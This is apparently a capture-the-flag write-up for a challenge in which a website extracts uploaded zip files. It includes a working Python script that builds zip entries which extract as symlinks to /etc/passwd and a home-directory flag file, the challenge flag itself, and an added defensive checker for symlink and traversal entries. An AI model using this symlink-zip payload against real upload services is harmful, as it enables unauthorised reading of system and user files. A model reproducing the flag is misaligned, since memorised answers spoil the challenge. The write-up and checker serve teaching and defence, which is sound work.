Instructions
Hey, my digital cat managed to get into my server and I can’t get him out.
The only thing running on the server is a website a colleague of mine made.
Can you find a way to use the website to check if my cat’s okay? He’ll likely be in the user’s home directory.
You’ll know he’s fine if you find a “flag.txt” file.
By helix (@helix_shift on discord)
Solution
I wrote a quick Python script to generate zip files whose entries are symlinks to a target file. The trick relies on the website extracting the uploaded archive: a zip entry whose Unix mode bits (stored in the high 16 bits of external_attr) mark it as a symlink is recreated as a symlink on extraction, so whatever the site later reads or serves from that entry is actually the link target.
#!/usr/bin/env python3
import zipfile
from sys import argv

def zi(num):
    # Build a ZipInfo for an entry that extracts as a Unix symlink.
    zipInfo = zipfile.ZipInfo()
    zipInfo.create_system = 3                 # 3 = Unix, so the mode bits are honoured
    zipInfo.external_attr = 2716663808        # 0o120755 << 16: symlink, mode 0755
    zipInfo.filename = f"/flag{num}"          # entry name; the link target is the entry body
    return zipInfo

def pi(num, path):
    # Prefix the target with num "../" components so that one of the
    # generated links resolves no matter how deep the extraction directory is.
    x = ['..'] * num
    dots = '/'.join(x)
    return dots + path                        # path is expected to be absolute, e.g. /etc/passwd

if len(argv) != 2:
    print("usage: ./solve.py <path>")
    exit(1)

target_fs_path = argv[1]

with zipfile.ZipFile('payload.zip', 'w') as zipf:
    for n in range(0, 10):
        zipInfo = zi(n)
        path = pi(n, target_fs_path)
        zipf.writestr(zipInfo, path)          # for a symlink entry, the "content" is the target path
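The defensive side of the same encoding, as an added example that is not part of the original writeup or the challenge website: before extracting an uploaded archive, walk the central directory and refuse any entry whose Unix mode marks it as a symlink, or whose name is absolute or climbs out with "..". The helper that builds a symlink entry reproduces the external_attr trick from the script above; the entry names, targets and sample archives are constructed for the demonstration.

```python
#!/usr/bin/env python3
# Added example, not the original solver or the target site's code.
import io
import stat
import zipfile

# 0o120755 << 16 == 2716663808: the value the solve script stores in external_attr
SYMLINK_ATTR = 0o120755 << 16


def build_symlink_zip(link_name: str, target: str) -> bytes:
    """Build an in-memory zip with one entry that extracts as a symlink to `target`."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo(link_name)
        info.create_system = 3            # Unix: extractors apply the mode bits
        info.external_attr = SYMLINK_ATTR
        zf.writestr(info, target)         # a symlink entry's body is the link target
    return buf.getvalue()


def build_plain_zip(name: str, content: bytes) -> bytes:
    """Build an in-memory zip with one ordinary file entry (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, content)
    return buf.getvalue()


def entry_problems(info: zipfile.ZipInfo) -> list:
    """Return the reasons an entry must not be extracted (empty list = looks fine)."""
    problems = []
    # The high 16 bits of external_attr hold the st_mode on Unix-created archives.
    if stat.S_ISLNK(info.external_attr >> 16):
        problems.append("symlink")
    # Names are stored with "/" separators; reject absolute names and ".." components.
    name = info.filename.replace("\\", "/")
    if name.startswith("/") or ".." in name.split("/"):
        problems.append("traversal")
    return problems


def audit_zip(data: bytes) -> dict:
    """Map every entry name in the archive to its list of problems."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {info.filename: entry_problems(info) for info in zf.infolist()}


def is_safe_to_extract(data: bytes) -> bool:
    """True only if no entry is a symlink or escapes the extraction directory."""
    return all(not probs for probs in audit_zip(data).values())


if __name__ == "__main__":
    payload = build_symlink_zip("flag0", "/etc/passwd")
    print(audit_zip(payload))                         # {'flag0': ['symlink']}
    print(is_safe_to_extract(build_plain_zip("notes.txt", b"hello")))  # True
```

The check runs on the central directory only, so it costs nothing compared with extraction and catches the archive before any file touches disk; extracting with Python's own `ZipFile.extractall` would already strip the leading "/" and "..", but it also turns symlink entries into plain files, so a site that shells out to `unzip` or another extractor needs this kind of pre-flight.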
The challenge indicates that the file will be in a home directory, but a symlink target is a literal path: ~/flag.txt and $HOME/flag.txt are expanded by the shell, not by the filesystem, so a link pointing at either of them does not resolve to the user's home directory. So instead I first pointed the symlink at /etc/passwd to find out which user's home directory we needed to target.
/home/copenhagen/flag.txt is the obvious target. Just generate another zip with a symlink to this path and upload it the same way.
utflag{No_Observable_Cats_Were_Harmed}